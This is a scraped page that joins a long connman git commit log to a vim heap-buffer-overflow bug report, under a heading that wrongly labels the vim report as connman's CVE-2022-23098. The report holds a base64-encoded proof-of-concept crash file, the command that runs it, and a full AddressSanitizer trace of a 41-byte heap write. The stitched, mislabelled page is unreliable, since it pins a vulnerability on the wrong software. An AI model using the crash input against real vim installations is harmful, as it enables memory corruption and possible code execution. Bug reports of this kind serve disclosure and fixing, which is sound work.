AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

CVE-2022-23098: connman/connman.git - Connection Manager

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

*   Heap Overflow and arbitrary 41 bytes write.
    
*   Unsorted bin doubly linked list corruption.
    
*   commit hash : 058ee7c5699ef551be5aa04c66b3cffc436e9b08
    

**Proof of Concept**

    $ echo -ne "bm9ybTBv7wX//wUwIDUwMDAwMDAwezAtMDAwMP/yAAD6MDAwMDAwMDAwMDQwKSkpMDAQMDAwMDAw
    AAogIFVpbCFub3JtCPkICAgIEAAAAA4KICBzFCwUFBQUFBQUFBQUFBQUFGxrsWUKICBzaWwhbm9y
    bQgICBj31/cwFhcYsk8qAAQwMjIyMjIiMjKAMDAwMDAwMDAwMDCAADAAAAEA/38AADAwMCVkZ4Vv
    ZXh0YBQUFBQPa25lMDAwfAACdCAUFBQUD2tuZQnTNnIyMjIyMjIyMDAwMDBAMDA2NjY2NsbGAAHC
    xjAwAQAwMDAwMDAwMDQwgBkBADAwMDAyMDAwMDBTMDAwMDAwgDARMDAwMDBAMDAwMDAwMDA3MEUw
    MDAwMDAwMDBSMHAwLTAwMDAwMDAwMDAwMDAwMDAwMDAwMDBAMDAwMDAwMDAwNDAwAH8wMDAwMDAw
    MIAwnjCyTyp8fHx8fHx0IDBNMDAwMAAAMDAwMAAKICBzaWwhbm9ybQgICAgIEDAwMDAwMDA2MDAw
    MCIwMEAwMDAwfWdnZ2lnZ2dOJ2dVZ2dnZ2dnZ2dnZ2cmMDAwMDAyMDB4dCAUFBQUD2tuZQogMDAw
    MDAwMDAwMCEwADAwAAAAgDAwMDAwMDD/fyAwMA9LEzAwMDAwMHswLTAwMDD/8gAA+jAwMDAwMDAw
    MDA0MCkpKTAwRjowMMDAwGV4dGAUFBQUD2tuZTAwMDD1LzD/fxUwMDAwMDAwMBNTU1NTU1NTU1NT
    U1NTU1NTMDAwMDAeMDAcMDBwAAEwgAAwODAwMDAwMDA8MDAwMDAwMDBNMDAZMDAwMDAwXzcwMDAw
    MDAwMDAwMDAwMDgwMDAwMDErMDAwLxEwMP8wMDAwMDAwMDMwAAAAQDAwMDAwMDAwMCEwADAwAAAA
    gDAwMBowMDAwTTAwMDAwMDAwMDA3MDAwMDAA/zAICAgWFw6yTyoDZ3kwMPoACiAgMDAwMDAwMAA=" | base64 -d > poc
    
    $ /home/alkyne/fuzzing/vim_asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc  -c ":qa!"
    ïÿ0 50000000{0-01777777777777777777777ÿò
    ïÿ0 50000000{0-01777777777777777777777ÿò
    =================================================================
    ==3619358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000007473 at pc 0x000000495b45 bp 0x7ffd1dd9e330 sp 0x7ffd1dd9daf8
    WRITE of size 41 at 0x602000007473 thread T0
        #0 0x495b44 in __asan_memmove (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44)
        #1 0x51ee94 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10
        #2 0x51ee94 in ins_char_bytes /home/alkyne/fuzzing/vim_asan/src/change.c:1094:2
        #3 0x51f6fe in ins_char /home/alkyne/fuzzing/vim_asan/src/change.c:1003:5
        #4 0x988589 in swapchar /home/alkyne/fuzzing/vim_asan/src/ops.c:1445:6
        #5 0x99b554 in swapchars /home/alkyne/fuzzing/vim_asan/src/ops.c:1379:16
        #6 0x99b554 in op_tilde /home/alkyne/fuzzing/vim_asan/src/ops.c:1303:17
        #7 0x99b554 in do_pending_operator /home/alkyne/fuzzing/vim_asan/src/ops.c:4109:3
        #8 0x93bb29 in normal_cmd /home/alkyne/fuzzing/vim_asan/src/normal.c:1146:2
        #9 0x70ce2b in exec_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c
        #10 0x70bb3c in exec_normal_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8601:5
        #11 0x70bb3c in ex_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8519:6
        #12 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #13 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #14 0xbbae2d in do_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1512:5
        #15 0xbb8e8c in cmd_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1098:14
        #16 0xbb8e8c in ex_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1124:2
        #17 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
        #18 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
        #19 0xf99d44 in exe_commands /home/alkyne/fuzzing/vim_asan/src/main.c:3091:2
        #20 0xf99d44 in vim_main2 /home/alkyne/fuzzing/vim_asan/src/main.c:774:2
        #21 0xf9677f in main /home/alkyne/fuzzing/vim_asan/src/main.c:426:12
        #22 0x7fdf81c100b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41da9d in _start (/home/alkyne/fuzzing/vim_asan/src/vim+0x41da9d)
    
    0x602000007473 is located 0 bytes to the right of 3-byte region [0x602000007470,0x602000007473)
    allocated by thread T0 here:
        #0 0x4961dd in malloc (/home/alkyne/fuzzing/vim_asan/src/vim+0x4961dd)
        #1 0x4c5e15 in lalloc /home/alkyne/fuzzing/vim_asan/src/alloc.c:248:11
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44) in __asan_memmove
    Shadow bytes around the buggy address:
      0x0c047fff8e30: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e50: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8e70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
    =>0x0c047fff8e80: fa fa 02 fa fa fa 03 fa fa fa 01 fa fa fa[03]fa
      0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3619358==ABORTING
    
    

**Impact**

Heap Overflow may lead to execute arbitrary code.

Tag

#buffer_overflow